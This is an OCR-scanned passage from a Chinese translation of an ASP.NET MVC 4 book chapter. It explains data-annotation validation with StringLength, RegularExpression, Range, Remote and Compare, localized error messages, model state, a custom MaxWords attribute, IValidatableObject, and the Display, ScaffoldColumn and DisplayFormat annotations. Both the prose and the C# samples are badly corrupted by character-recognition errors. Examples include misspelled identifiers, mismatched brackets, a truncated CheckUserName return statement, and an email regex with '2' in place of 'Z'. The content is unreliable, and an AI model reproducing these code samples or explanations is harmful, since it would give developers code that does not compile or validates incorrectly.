的 数据 库 模 式 设 置 了 名 字 的 最 大 长 度 是 160 个 字符 。 如 果 试 图 向 数据 库 中 插入 一 个 超过 最 
大 长 度 的 名 字 ， 就 会 出 现 异常 。 这 就 是 StringLength 特性 的 用 武之 地 ， 它 可 以 确保 顾客 提 
供 的 字符 串 长 度 符合 数据 库 模 式 的 要 求 : 

[Required | 


[StringLength (160)] 
Public string FirstName { get; set; } 


[Required | 

[StringLength (160)] 

public string LastName 1{ get; set; | 

这 里 要 注意 一 下 对 同一 个 属性 设置 多 个 验证 特性 的 方式 。 设置 了 StringLength 特性 后 ， 
顾客 如 果 输 入 了 过 多 的 字符 ， 丈 会 看 到 LastName 输入 框 下 方 的 默认 错误 提示 消 上 号 ， 如 图 
6-3 所 示 。 
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FirstName _ 

The FirstName field is required 

LastName 
Wolfeschlegelsteinhausenbergerdorffyoralternwareng 


[he field LastName must be a stnng with a 
maximuyum length of 160 


图 6-3 


名 为 MinimumLength 的 参数 是 一 个 可 选项 ,， 它 可 以 用 来 设 定 字 符 串 的 最 小 长 度 。 下 面 
的 代码 设置 了 FirstName 属性 , 要 求 顾 客 至 少 要 包含 3 个 (小 于 等 于 160 个 ) 字 符 的 属性 值 才 
能 通过 验证 : 

[Required | 


[StringLength (160, MinimumLength=3)] 
public string FirstName 1{ get; set; } 


3. RegularExpression 


模型 类 Order 的 一 些 属性 要 求 的 不 只 是 简单 的 非 空 或 长 度 验证 。 例 如 ， 茶 些 订 单 的 
Email 属性 需要 的 是 一 个 有 效 可 用 的 e-mail 地 址 。 然 而 事实 上 ， 在 不 向 该 地 址 发 送 一 封 邮 
件 等 每 啊 应 的 情况 下 ， 确 保 一 个 e-mail 地 址 的 可 用 性 是 不 切合 实际 的 。 我 们 所 能 做 的 就 是 
使 用 正则 表达 式 来 使 输入 的 子 符 串 看 起 来 像 可 用 的 e-mail 地 址 : 

[RegularExpression (@" [A—2a—z0-9. $+-]+@[A-—2a-z0-9.-]+\.[A-Z2a—z] {2,4}")] 

public string Email { get; set; |} 

正则 表达 式 是 一 种 检查 字符 串 格式 和 内 容 的 简洁 有 效 方式 。 如 果 顾 客 输入 的 e-mail 地 
址 不 能 和 正则 表达 式 匹 配 ， 束 会 看 到 如 图 6-4 所 示 的 错误 提示 消 明 。 


| 


Phone 

Emal 

|odetocode | 

The Tield Emall must match the regular Expresslon 
[A-2Za-z0-9. %+-|+@[A-2a-z0-9.-]+1\[A-Za-zl{2.,4) 


图 6-4 

对 于 非 专业 开发 人 员 而 言 (甚至 对 一 些 专 业 开 发 人 员 来 说 也 是 如 此 )， 这 一 错误 提示 消 
奶 看 起 来 就 像 是 胡乱 融 击 键盘 产生 的 乱码 ， 没 有 任何 实际 意义 。 鉴 于 此 ， 接 下 来 将 会 介绍 
如 何 设置 人 性 化 的 错误 提示 消 妃 。 

4. Range 

Range 特性 用 来 指定 数值 类 型 值 的 最 小 值 和 最 大 值 。 如 果 MVC Music Store 仅 面 问 中 
年 顾客 提供 服务 的 话 ， 就 可 以 在 Order 类 中 诺 加 Age 属性 并 按照 下 面 的 代码 在 其 上 添加 
Ranege 特性 : 
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[Range (35，44) | 

Public int Age 1{ get; set; } 

该 特性 的 第 一 个 参数 设置 的 是 最 小 值 ， 第 二 个 参数 设置 的 是 最 大 值 ， 这 两 个 值 也 包含 
在 范围 之 内 。Range 特性 既 可 用 于 int 类 型 ， 也 可 用 于 double 类 型 。 它 的 构造 函数 的 男 一 
个 重 载 版 本 中 有 一 个 Type 类 型 的 参数 和 两 个 字符 串 ( 这 样 就 可 以 给 date 属性 和 decimal 属 
性 闭 加 范围 限制 了 )。 

[Range (typeof (decimal), 0.00 ” ， ”49.99 ) 


Public decimal Price { get; set; 上 } 


5. System.Web.Mvc 下 的 验证 特性 


ASPNET MVC 框架 还 为 应 用 程序 在 名 称 空间 System.Web.Mvc 中 额外 添加 了 两 个 验证 
特性 。 其 中 一 个 是 Remote 特性 。 

Remote 特性 可 以 利用 服务 喜 端 的 回调 函数 执行 客户 端的 验证 多 辑 。 以 MVC Music 
Store 中 RegisterModel 类 的 UserName 属性 为 例 ， 系 统 中 不 允许 两 个 用 户 具有 相同 的 
UserName 值 ， 但 在 客户 请 很 难 通过 验证 来 确保 UserName 属性 值 的 唯一 性 (除非 把 所有 的 
用 户 名 都 从 数据 库 传 送 到 客户 端 )。 使 用 Remote 特性 可 以 把 UserName 的 值 传 到 服务 器 ， 
然后 在 服务 器 端的 数据 库 中 与 相应 的 表 字 段 值 进行 比较 : 


[Remote (" ChecKkUseTrName"，" Account 7”") 
public string UserName { get set; |} 


在 特性 中 可 以 设置 客户 站 代 码 要 调用 的 控制 器 名 称 和 操作 名 称 。 和 客户 端 代码 会 目 动 把 
用 户 输 入 的 UserName 属性 值 发 送 到 服务 器 ， 该 特性 的 一 个 重 载 构造 方法 还 允许 指定 要 发 
送 给 服务 器 的 其 他 字段 : 


public JsonResult CheckUserName (string username) 

{ 
var result = Membership.FindUsersByName (username) .Count == 
return Jsonl(result, JsonRequestBehavior.AllowGet); 


} 

上 面 的 控制 器 操作 会 利用 与 UserName 属性 同名 的 参数 进行 验证 ， 并 返回 一 个 封装 在 
JavaScript Object Notation(JSON) 对 象 中 的 布尔 类 型 值 (true 或 false)。 第 8 章 将 详细 介绍 
JSON、Ajax 和 其 他 客户 端 特征 。 

第 二 个 是 Compare 特性 ， 它 用 于 确保 模型 对 象 的 两 个 属性 拥有 相同 的 值 。 例 如 ， 为 了 
避免 顾客 输入 错误 ， 人 往往 要 求 输入 两 次 e-mail 地 址 ; 

[RegularExpression (@" [A—2a—z0-9. $+-]+@[A-—Z2a-z0-9.-]+\. [A-2a—z]{2,4}")] 


public string Email { get set; } 


[Compare ("Email")] 
public string EmailConfirm 1{ get; Set | 
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如 果 顾 客 两 次 输入 的 e-mail 地 址 不 一 致 ， 就 会 出 现 如 图 6-5 所 示 的 错误 提示 消息 。 
|scott@@odetocode com 


EmallConfirm 
Isallen(@odetocoda com 
EmallGonfinm and Emall do not match 


图 6-5 


下 是 由 于 数据 注解 的 可 扩展 性 ， 才 导致 了 Remote 和 Compare 特性 的 产生 。 本 章 后 面部 
分 会 介绍 如 何 创 建 自 定义 注解 。 下 面 介绍 如 何在 验证 失败 时 创建 自 定 义 的 销 误 提示 消 明 。 
6.1.2 自 定义 错误 提示 消息 及 其 本 地 化 


每 个 验证 特性 都 允许 传递 一 个 带 有 目 定 义 错误 提示 消 奶 的 参数 。 例 如 ， 如 果 不 喜 欢 与 
RegularExpression 特性 关联 的 默认 错误 提示 消息 (因为 它 显 示 的 是 正则 表达 式 )， 可 使 用 如 
下 代码 目 定义 错误 提示 消 忆 : 

[RegularExpression (@" [A-za—z0-9. $%+-]+8@[A-2a-z0-9.-]+\.[A-2a-z] {2,4}", 

ErrorMessage="Email doesn't look like a valid emalil address.")] 


PublLic string Email { get; set; 上 


ErrorMessage 是 每 个 验证 特性 中 用 来 设置 错误 提示 消息 的 参数 名 称 : 


[Requlired (ErrorMessage="Your last name 1s required")] 
[stringLength (160, ErrorMessage="Your last name is too long")] 
public string LastName { get set; } 


目 定 义 的 馈 误 提示 消息 在 字符 串 中 也 有 一 个 格式 项 。 内 置 特性 使 用 友好 的 属性 显示 名 
称 格式 化 错误 提示 消息 字符 串 ( 本 章 后 面 会 详 述 如 何在 显示 注解 中 设置 显示 名 称 )。 作 为 
个 例子 ， 请 看 下 面 代码 中 的 Required 特性 : 

[Required (ErrorMessage="Your {0} Is required.")] 


[stringLength (160, ErrorMessage="{0} is too long.™)]| 
public string LastName { get; set |} 


该 特性 使 用 了 带 有 格式 项 ( {0} ) 的 错误 提示 消 和 县。 如 果 客 户 不 填写 LastName， 束 会 
出 现 如 图 6-6 所 示 的 错误 提示 消 筷 。 


FirstName 
Scott 


LastName 
Youl LastName Iis required 


图 6-6 


如 果 应 用 程序 是 面向 国际 市 场 开发 的 ， 那 么 这 种 便 编 公 错 误 提示 消 奶 的 技术 就 不 大 实 
用 了 。 这 时 就 不 简单 是 像 上 和 耐 这 样 显示 的 固定 文本 ， 而 是 为 不 同 的 地 区 显示 不 同 的 文本 内 
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容 。 羊 好 ， 所 有 验证 特性 都 允许 为 本 地 化 的 错误 提示 消息 指定 资源 类 型 名 称 和 资源 名 称 。 


[Redulred (ErrorMessageResourceType=typeotf (ErrorMessages), 
ErrorMessageResourceName="LastNameRequlired")| 
[stringLength (160, ErrorMessageResourceType = typeof (ErrorMessages), 
ErrorMessageResourceName = "LastNameTooLong")| 
public string LastName 1{ get; set; } 


上 面 的 代码 假设 在 项 目 中 有 一 个 名 为 ErrorMessages.resx 的 资源 文件 , 并 且 其 中 包含 所 
需要 的 条 日 (如 LastNameRequired 和 LastNameTooLong)。 在 ASPNET 中 ,要 使 用 本 地 化 的 
资源 文件 ， 需 要 将 当前 线程 的 UICulture 属性 设置 为 相应 的 地 域 语 言 。 想 要 了 解 更 多 的 信 
息 ， 请 参阅 “How to : Set the Culture and UI Culture for ASPNET Page Globalization”， 网 址 
为 http://msdn.microsoft.com/en-us/library/bz9tc508.aspx。 


6.1.3 注解 的 后 台 原 理 

在 介绍 控制 器 和 视图 中 的 验证 错误 如 何 协调 工作 以 及 如 何 创建 目 定义 的 验证 特性 之 
前 ， 很 有 必要 理解 验证 特性 的 内 部 机 制 。ASPNET MVC 的 验证 特性 是 由 模型 绑 定 器 、 模 
型 元 数据 、 模 型 验证 器 和 模型 状态 组 成 的 协调 系统 的 一 部 分 。 

1 验证 和 模型 绑 定 

在 阅读 验证 注解 部 分 时 ， 可 能 会 有 几 个 疑问 : 验证 是 什么 时 候 发 生 的 ? 如 何 才 能 知道 
验证 失败 ? 

默认 情况 下 ，ASPNET MVC 框架 在 模型 绑 定 时 执行 验证 逻辑 。 正 如 第 4 章 中 提 到 的 ， 
在 操作 方法 带 有 参数 时 ， 就 会 隐 式 地 执行 模型 绑 定 : 


[HttpPost |] 
public ActionResult Create (Album album) 
{ 
// the album parameter was created wia model binding 
7 
} 
当然 ,也 可 以 利用 控制 器 的 UpdateModel 或 TryUpdateModel 方 法 显 式 地 执行 模型 绑 定 : 
[HttpPost] 
public ActionResult Edit (int id, FormCollection collection)} 
| 


Var album = storeDB.Albums.Find(id).; 


It (TryUpdateModel (album)) 
{ 
i 
} 
} 


模型 绑 定 右 一 旦 使 用 新 值 完成 对 模型 属性 的 更 新 ， 就 会 利用 当前 的 模型 元 数据 获得 模 
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型 的 所 有 验证 器 .ASPNET MVC 运行 时 提供 了 一 个 验证 器 (DataAnnotationsModelValidator) 
来 与 数据 注解 一 同 工 作 。 这 个 模型 验证 器 会 找到 所 有 的 验证 特性 并 执行 它们 包含 的 验证 逻 
辑 。 模 型 绑 定 器 捕获 所 有 失败 的 验证 规则 并 把 它们 放 入 模型 状态 中 。 

2. 验证 和 模型 状态 


模型 绑 定 主要 的 副产品 是 模型 状态 (利用 Controller 派 生 类 对 象 的 Modelstate 属性 可 以 访问 
到 )。 模 型 状态 不 仅 包 含 了 用 户 想 放 入 模型 属性 里 的 所 有 值 ， 也 包括 与 每 个 属性 相关 联 的 所 有 
汗 误 (还 有 所 有 与 模型 对 象 本 身 有 关 的 错误 )。 如 果 在 模型 状态 中 存在 错误 ，ModelState.IsValid 
束 返 |9| false。 
例如 ， 假 设 顾 客 在 没有 填写 LastName 值 的 情况 下 ， 提 交 了 结算 表单 。 由 于 设置 了 
Required 验证 注解 特性 ， 因 此 在 模型 绑 定 之 后 ， 下 面 的 所 有 表达 式 将 返回 true: 
Modelstate.IsValid == false 


Modelstate.IsValidrFrield("LastName") == false 
Modelstate|[|"LastName" | .Errors.Count > 0 


也 可 在 模型 状态 中 碍 看 与 失败 验证 相关 的 错误 提示 消 县 : 


var lastNameErrorMessage = Modelstatel"LastName"| .Errors|0|] .ErrorMessage; 


当然 ， 通 常 很 少 编写 代码 来 查看 特定 的 错误 提示 消息 。 跟 运行 时 自动 地 向 模型 状态 注 
入 验证 错误 信息 一 样 ， 它 也 能 够 上 自动 地 从 模型 状态 中 提取 错误 信息 。 正 如 第 5 章 介绍 的 ， 
内 置 的 HTML 辅助 方法 可 以 利用 模型 状态 (和 模型 状态 中 出 现 的 错误 ) 来 改变 模型 在 视图 中 
的 显示 。 例如 ，ValiadationMessage 辅助 方法 可 通过 查看 模型 状态 来 显示 与 特定 部 分 视图 数 
据 相 关 的 错误 提示 消息 : 


QHtml .ValidationMessageFor (m => m.LastName) 
控制 右 操 作 通 种 需要 关心 的 问题 是 : 模型 状态 是 否 有 效 ? 
6.1.4 控制 怖 操作 和 验证 销 误 


控制 如 操作 决定 了 在 模型 验证 失败 和 验证 成 功 时 的 执行 流程 。 在 验证 成 功 时 ， 操 作 通 
常会 执行 必要 的 步 又 来 保存 或 更 新 客户 的 信息 。 当 验证 失败 时 ， 操 作 一 般 会 重新 泻 染 提交 
模型 值 的 视图 。 这 样 就 可 以 让 用 户 看 到 所 有 的 验证 错误 提示 消 轧 ， 并 按照 提示 改正 输入 销 
误 或 补 填 遗 漏 的 字段 信息 。 以 下 代码 中 的 AddressAndPayment 操作 就 展示 了 这 个 典型 的 
操作 行为 : 

[Ht 上 PPos 七 ] 

public ActionResult AddressAndPayment (Order newOrder) 


{ 
i (ModelState.IsValid) 
{ 
newOrader .UseTrname = User.ldentity.Name; 
mnewoOraer .OradeTrDate = DateTime .Now; 
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storeDB.Orders.Add (newOraer) ; 
storeDB.SaveChanges () ; 


/ Process the order 

var cart = ShoppingCart.GetCart (this); 

cart.createorder (newOrder); 

return RedirectToAction("Complete", new { id = newOrder.OrderlId }); 


} 
// Invalid -- redisplay with errors 
return View (newOrder).; 


} 

上 面 的 这 段 代 码 将 立即 检查 ModelState 的 IsValid 属性 。 模 型 绑 定 器 已 经 构建 好 一 个 
Order 类 对 象 ， 并 用 请 求 中 (提交 的 表单 ) 的 值 类 填充 它 。 当 模型 绑 定 右 完 成 订单 的 更 新 后 ， 
它 就 会 执行 所 有 与 这 个 对 象 关 联 的 验证 规则 。 因 此 , 可 以 知道 这 个 对 象 是 否 处 于 正确 状态 。 
也 可 以 通过 显 式 地 调用 UpdateModel 或 TryUpdateModel 来 实现 这 个 操作 ， 如 下 面 的 代码 
所 未: 


[Ht 上 PPos | 
public ActionResult AddressAndPavyment (FormCollection collection) 
{ 
Var newOrder = new Oraer1() : 
TryUpdateModel (mewOraer) : 
]T (Modelstate.IsValid) 
{ 
newOrder.Username = User.ldentity.Name; 
newOrder.OrderDate = DateTime .Now; 
storeDB.Orders.Add (neworder).; 
storeDB.SaveChanges ();}; 


// Process the order 
var cart = ShoppingCart.GetCart (this); 
cart.CreateOrder (newOrder); 
return RedirectToAction("Complete", new { id = newOrder.OrderlId }); 
} 
// Invalid -- redisplay with errors 
return View (newOorder),; 


} 


可 以 采取 多 种 方式 来 处 理 这 个 问题 ， 但 是 注意 上 和 面 实 现 的 两 段 代 人 码 都 检查 了 模型 状态 
的 有 效 性 。 如 果 模 型 状态 无 效 ， 操 作 就 会 重新 泻 染 AddressAndPayment 视图 ， 给 用 户 一 个 
修正 验证 错误 ， 重 新 提交 表单 的 机 会 。 

通过 上 面 的 介绍 ， 可 以 看 出 数据 注解 特性 给 验证 市 来 了 简易 性 和 透明 性 。 当 然 ， 这 些 
内 置 的 特性 不 可 能 满足 应 用 程序 中 可 能 遇 到 的 所 有 验证 场合 。 框 慷 提 供 了 简易 的 方法 来 创 
建 目 定义 的 验证 方法 ， 以 适应 特殊 场合 。 
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6.2 目 定 义 验证 逻辑 


ASPNET MVC 框架 的 扩展 性 意味 看 实现 上 自 定 义 验证 逻辑 有 大 很 大 的 可 行 性 。 本 节 重 
点 介绍 两 个 核心 应 用 方法 : 

e 将 验证 逻辑 封装 在 目 定义 的 数据 注解 中 。 

e 将 验证 逻辑 封装 在 模型 对 象 中 。 

把 验证 逻辑 封装 在 目 定 义 数 据 注解 中 可 以 轻松 地 实现 在 多 个 模型 中 重用 逻辑 。 当 然 ， 
这 样 需要 在 特性 内 部 编写 代码 以 应 对 不 同类 型 的 模型 ， 但 一 旦 实现 ， 新 的 注解 束 可 以 在 多 
处 重用 。 

男 一 方面 ， 如 果 将 验证 逻辑 直接 放 入 模型 对 象 中 ， 束 意味 着 验证 逻辑 可 以 很 容易 地 编 
码 实 现 , 因为 这 样 只 需 关 心 一 种 模型 对 象 的 验证 逻辑 , 但 这 种 方式 不 利于 实现 逻辑 的 重用 。 

下 和 面 几 节 将 详细 介绍 这 两 种 方式 ， 首 先 介 绍 目 定 义 数据 注解 方式 。 
6.2.1 自 定义 注解 

假设 要 限制 顾客 输入 姓氏 中 单词 的 数量 ， 例 如 姓氏 中 单词 的 数量 不 得 超过 10 个 ， 并 
日 还 要 让 这 种 验证 (限定 一 个 string 类 型 的 最 大 单词 数 ) 在 Music Store 应 用 程序 的 其 他 模型 
中 重用 。 如 果 是 这 样 ， 可 考虑 将 验证 逻辑 封装 在 一 个 可 重用 的 特性 中 。 

所 有 的 验证 注解 (如 Required 和 Range) 特 性 最 终 都 派生 目 基 类 ValidationAttribute， 它 
是 个 抽象 类 ， 在 名 称 空间 System.ComponentModel.DataAnnotations 中 定义 。 同 样 ， 程 序 员 
的 验证 逻辑 也 必须 派生 上 自 ValidationAttribute 的 类 : 


Using System.ComponentModel .DataAnnotations; 


namespace MvycMusicstore.Inftrastructure 


{ 
public class MaxWordsAttribute : ValidationAttribute 
{ 
} 

} 


为 了 实现 这 个 验证 逻辑 ， 至少 需要 重 写 基 类 中 提供 的 IsValid 方法 的 其 中 一 个 版 本 。 重 
写 IsValid 方法 时 利用 的 ValidationContext 参数 , 提供 了 很 多 可 在 IsValid 方法 内 部 使 用 的 信 
垦 ， 如 模型 类 型 、 模 型 对 象 实 例 、 用 来 验证 属性 的 人 性 化 显示 名 称 以 及 其 他 有 用 信息 。 


public class MaxWordsAttribute : ValidationAttribute 


{ 
protected override ValidationResult IsValidl 
object value, ValidationContext validationContext) 
{ 
return ValidationResult.Success: 
} 
} 
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IsValid 方法 中 的 第 一 个 参数 是 要 验证 的 对 象 的 值 。 如 果 这 个 对 象 值 是 有 效 的 ， 就 可 以 

返回 一 个 成 功 的 验证 结果 ， 但 在 判断 它 是 否 有 效 之 前 ， 需 要 知道 单词 数 的 上 限 。 要 获得 这 

上限， 可 以 通过 向 这 个 特性 添加 一 个 构造 函数 来 要 求 顾 客 把 最 大 单词 数 作 为 一 个 参数 传 
递 给 它 : 


public class MaxWordsAttribute : ValidationAttribute 


| 
public MaxWordsAttribute (int maxWords) 
{ 
maxWords = maxWords,; 
} 
protected override ValidationResult IJIsValid il 
object value, ValidationContext validationContext) 
{ 
return ValidationResult.Ssuccess; 
} 
Private readonly int maxWords,; 
} 


既然 已 经 参数 化 了 最 大 的 单词 数 ， 下 和 而 就 可 以 实现 验证 逻辑 来 捕获 错误 了 : 


public class MaxWordsAttribute : ValidationAttribute 


{ 
public MaxWordsAttribute(int maxWordads ) 
{ 
_ImaxWoras = maxWords; 
} 


protected override ValidationResult IsValidl 
object value, ValidationContext validationContext) 


{ 
if (valLue (1!= null) 
{ 
Var valueAsstring = Value .ToSstrInG() : 
if (valueAsstring.Ssplit(' ') .Dength > maxWords) 
{ 
return new ValidationResult("Too many words!").， 
} 
} 
return ValidationResult.sSuccess; 
} 
private readonly int maxWords; 


} 


上 面 的 代码 通过 使 用 Split 方法 以 空格 作为 分 隔 符 来 分 隔 输入 值 , 统计 生成 的 字符 串 数 
量 ， 并 对 输入 字符 串 的 单词 数目 进行 简单 的 验证 。 如 果 单 词 数目 超过 了 了 上限， 系统 就 会 返 
回 一 个 带 有 便 编 码 错误 提示 消息 的 ValidationResult 对 象 ， 以 告知 验证 失败 。 

上 和 面 代码 中 的 问题 在 于 便 编 码 的 错误 提示 消 姑 那 行 代 人 码 。 使 用 数据 注解 的 开发 人 员 项 
望 可 以 使 用 ValidationAttribute 的 ErrorMessage 属性 来 自 定义 错误 提示 消息 。 同 时 还 要 与 其 
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他 验证 特性 一 样 , 提供 一 个 默认 的 错误 提示 消息 (在 开发 人 员 没有 提供 目 定义 的 错误 提示 消 
恩 时 使 用 ) 并 且 还 要 利用 验证 的 属性 名 称 生成 错误 提示 消 居 : 


public class MaxWordsAttribute : ValidationAttribute 


{ 


} 


public MaxWordsAttribute (int maxWords) 
:base ("{0} has too many words.") 
{ 
_ImaxWoras = maxWords; 
} 
protected override ValidationResult IsValidl 
obJject value, ValidationContext validatijonContext) 


1 
if (value '= null) 
{ 
Var ValueasString = Value -IToString() :; 
if (valueAsSstring.split(" ').Length > maxWords) 
1 
Var errorMessage = FormatErrorMessagel 
vallidationContext .DisplayName).: 
return new ValidationResult (errorMessage).: 
} 
} 
return ValidationResult.Success,; 
} 


private readonly int maxWords; 


前 面 的 代码 做 了 两 处 改动 : 
。 首先 ， 向 基 类 的 构造 函数 传递 了 一 个 默认 的 错误 提示 消息 。 如 果 正 在 面向 国际 开发 


\ 认 的 错误 提示 消息 。 


应 用 程序 的 话 ， 就 应 该 从 一 个 资源 文件 中 提取 这 个 


e 注意 ,默认 的 错误 提示 消 奶 中 包含 了 一 个 参数 占 位 得 ({0})。 这 个 占 位 得 之 所 以 存在 ， 


是 因为 第 二 处 改动 , 即 调用 继承 的 FormatErrorMessage 方法 会 自动 使 用 显示 的 属性 
名 称 来 格式 化 这 个 字符 串 。 


FormatErrorMessage 可 以 确保 我 们 使 用 合适 的 错误 提示 消 上 县 字符 串 ( 即 使 这 个 字符 串 是 
存储 在 一 个 本 地 资源 文件 中 )。 这 条 代码 语句 需要 传递 name 属性 的 值 ， 这 个 值 可 以 通过 
validationContext 参数 的 DisplayName 属性 获得 。 构造 完 验 证 逻辑 后 , 就 可 以 将 其 应 用 到 任 
何 模 型 属性 上 : 

[Required | 
[stringLength (160)1] 


[MaxWords (10) ] 
public string LastName 1{ get; set; |} 


其 至 可 以 赋予 特性 日 定义 的 错误 提示 消 轧 : 


[Required | 
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[stringLength (160) ] 
[MaxWords (10, ErrorMessage="There are too many words in {0}")| 
public string LastName 1{ get; set; } 


现在 ， 如 果 顾 客 输 入 了 过 多 单词 ， 束 会 在 视图 中 看 到 如 图 6-7 所 示 的 提示 消 乱 。 


FirstName _ 
Scott 


LastName 
one two three four five six seven eight nine ten eleve, 
There are too many words in LastName 


图 6-7 


可 以 按 NuGet 包 的 形式 获得 MaxWordsAttribute。 搜 索 Wrox.ProMvec4. 
Validation.MaxWordsAttribute 并 将 相应 代码 添加 到 项 目 中 。 


目 定义 特性 只 是 癌 模 型 提供 多 辑 验证 的 一 种 方式 。 正 如 刚才 看 到 的 ， 特 性 是 很 容易 在 
很 多 不 同 模型 类 中 实现 复 用 的 。 第 8 章 会 介绍 如 何 为 MaxWordsAttribute 特性 添加 客户 端 
验证 能 力 。 
6.2.2 lValidatableObject 


自 验证 (selfvalidating) 模 型 是 指 一 个 知道 如 何 验证 自身 的 模型 对 象 。 一 个 模型 对 象 可 以 
通过 实现 IValidatableObject 接口 来 实现 对 自身 的 验证 。 为 演示 这 个 方法 ， 下 面 在 Order 模 
型 中 直接 实现 对 LastName 字段 中 单词 个 数 的 检查 : 


public class Order : IVallidatablLeob]Jject 
{ 
public IEnumerable<ValidationResult> Validadate 
ValidationContext walidationContext) 
1 
1f (LastName 【= null && 
LastName.Split(" '} .Length > 10) 
{ 
yield return new ValidationResult ("The last name has too many words!", 
new [|]{"LastName™}); 
} 
} 
// rest of Order implementation and properties 
// ... 
} 


这 种 方式 与 特性 版 本 有 几 个 明显 的 不 同 点 : 
e MVC 运行 时 为 执行 验证 而 调用 的 方法 名 称 是 Validate 而 不 是 Valid， 但 更 重要 的 
是 ， 它 们 的 返回 类 型 和 参数 也 不 同 。 
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e Validate 的 返回 类 型 是 IEnumerable<ValidationResul 人 ， 而 不 是 单独 的 ValidationResult 
对 象 。 因 为 从 表面 上 看 ， 内 部 的 验证 迎 辑 验证 的 是 整个 模型 ， 因 此 可 能 返回 多 个 验 
证 错误 。 
e 这 里 没有 value 参数 传递 给 Validate 方法 , 因为 在 此 Validate 是 一 个 模型 实例 方法 ， 
在 其 内 部 可 以 直接 访问 当前 模型 对 象 的 属性 值 。 
注意 上 面 的 代码 使 用 了 C# 的 yield returm 语法 来 构建 枚 举 返 回 值 ， 同 时 代码 还 需要 显 
式 地 告知 ValidationResult 与 其 关联 的 字段 的 名 称 (在 这 个 例子 中 字段 的 名 称 是 LastName， 
但 是 ValidationResult 的 构造 消 数 的 最 后 一 个 参数 是 String 类 型 的 数组 ， 因 为 这 样 可 以 使 结 
果 与 多 个 属性 关联)。 
许多 验证 场合 通过 IValidatableObject 方式 都 可 以 更 容易 地 实现 ， 尤 其 是 在 需要 比较 模 
型 多 个 属性 的 应 用 场合 中 。 
到 目前 为 止 ， 我 们 已 经 对 所 有 需要 知道 的 验证 注解 做 了 介绍 ， 但 是 ASPNET MVC 框 
架 中 还 有 其 他 一 些 注 解 ， 它 们 能 够 影响 运行 时 显示 和 编辑 模型 的 方式 。 在 前 面 介 绍 “ 友 好 
地 显示 名 称 ” 时 ， 提 到 了 这 些 注解 ， 现 在 是 深入 了 解 这 些 内 容 的 时 候 了 。 


6.3 显示 和 编辑 注解 


在 本 章 的 开始 部 分 ， 我 们 为 顾客 创建 一 个 表单 来 提交 订单 处 理 所 需 要 的 信息 。 当 时 是 
使 用 HTML 辅助 方法 EditorForModel 实现 的 ， 但 生成 的 表单 与 期 望 不 符 ， 图 6-8 会 帮助 我 
们 唤醒 记忆 。 


Username 


FirstName 
Scott 


图 6-8 


在 这 个 截图 中 ， 可 以 明显 地 看 出 两 个 问题 : 

e 不 应 该 显示 Username 字段 ( 它 是 由 控制 器 操作 中 的 代码 来 填充 和 管理 的 )。 

e FirstName 字段 的 First 和 Name 两 个 单词 中 间 应 该 有 一 个 空格 。 

解决 这 些 问 题 的 方法 也 在 名 称 衬 间 DataAnnotations 中 。 

和 前 面 看 到 的 验证 特性 一 样 ， 模 型 元 数据 提供 器 会 收集 下 面 的 显示 (和 编辑 ) 注 解 信息 ， 
以 供 HTML 辅助 方法 和 ASPNET MVC 运行 时 的 其 他 组 件 使 用 。HTML 辅助 方法 可 以 使 用 
任何 可 用 的 元 数据 来 改变 模型 的 显示 和 编辑 UI。 


6.3.1 Display 


Display 特性 可 为 模型 属性 设置 友好 的 “显示 名 称 ”。 这 里 就 可 以 使 用 Display 特性 修改 
FirstName 字段 的 标签 显示 名 称 : 
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[RedulIred | 

[stringLength (160, MinimumLength=3)| 
[Display (Name="First Name")] 

public string FirstName 1{ get; set; |} 


加 上 这 个 特性 后 ， 视 图 就 会 演 染 出 如 图 6-9 所 示 的 画面 。 


Username 


First Name 


国 : ] 
图 6-9 


除了 名 罕 外 , Display 特性 还 可 以 控制 UI 上 属性 的 显示 顺序 .例如 , 要 实现 对 LastName 
和 FirstName 编辑 框 显示 次 序 的 控制 ， 可 使 用 下 面 的 代码 : 

[Required | 

[stringLength (160)1] 

[Display (Name="Last Name", Order=15001)] 

[MaxWords (10, ErrorMessage="There are too many words in {0}")] 

public string LastName 1{ get; set; |} 


[Required | 

[StringLength (160, MinimumLength=3)| 
[Display (Name="First Name", Order=15000)] 
public string FirstName { get set; | 


假设 在 Order 模型 中 没有 其 他 属性 具有 Display 特性 , 那么 表单 中 最 后 两 个 字段 的 顺序 
应 该 先是 FirstName， 然 后 才 是 LastName。Order 参数 的 默认 值 是 10 000， 各 个 字段 将 按照 
这 个 值 升序 排列 。 
6.3.2 ScatffoldColumn 

ScaffoldColumn 特性 可 以 隐藏 HIML 辅助 方法 (如 EditorForModel 和 DisplayForModel) 
演 染 的 一 些 属性 : 


[scaffoldColumn (false)l| 
public string Username 1{ get; set; | 


添加 这 个 特性 后 ，EditorForModel 辅助 方法 将 不 再 为 Username 字段 显示 输入 元 素 和 
label 标签 。 然 而 这 里 需要 注意 的 是 ， 如 果 模 型 绑 定 器 在 请 求 中 看 到 匹配 的 值 ， 那 么 它 仍 然 
会 试图 为 Username 属性 赋值 。 第 7 章 会 深入 介绍 这 个 应 用 ( 称 为 重复 提交 )。 

尽管 上 面 介绍 的 这 两 个 特性 足以 应 对 订单 表单 的 所 有 显示 场合 ， 但 下 面 仍然 继续 讲解 
和 ASPNET MVC 4 结合 使 用 的 其 他 注解 。 

6.3.3 DisplayFormat 
通过 命名 参数 ，DisplayFormat 特性 可 用 来 处 理 属性 的 各 种 格式 化 选项 。 当 属性 包含 空 
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值 时 ， 可 以 提供 可 选 的 显示 文本 ， 也 可 以 为 包含 标记 的 属性 关闭 HTML 纺 阳 ,还 可 以 为 运 
行 时 指定 一 个 应 用 于 属性 值 的 格式 化 字符 串 。 下 面 的 代码 可 将 模型 的 Total 属性 值 格式 化 
为 货币 值 形式 : 

[DisplayFormat (ApplyFormatinEditMode=true, DataFormatstring="{0:c}")] 

public decimal Total { get; set; } 

ApplyFormatInEditMode 参数 的 值 默认 是 false， 所 以 如 果 想 把 Total 属性 格式 化 为 表单 
输入 元 素 , 需要 将 属性 ApplyFormatInEditMode 的 值 设 置 为 true。 例如 , 当 把 模型 中 decimal 
类 型 的 Total 属性 值 设 置 为 12.1 时 ， 将 在 视图 中 看 到 如 图 6-10 所 示 的 输出 。 


Total 
$12 10 


图 6-10 
之 所 以 将 ApplyFormatInEditMode 参数 的 默认 值 设 为 false， 其 中 一 个 主要 原因 是 
ASPNET MVC 模型 绑 定 吉 不 能 显示 那些 解析 格式 化 的 值 。 在 这 个 例子 中 ， 由 于 字段 中 包含 有 
货币 符号 ， 模 型 绑 定 器 将 不 能 解析 提交 回 的 价格 值 。 因 此 应 将 属性 ApplyFormatInEditModel 
的 值 设 为 false。 
6.3.4 ReadOnly 
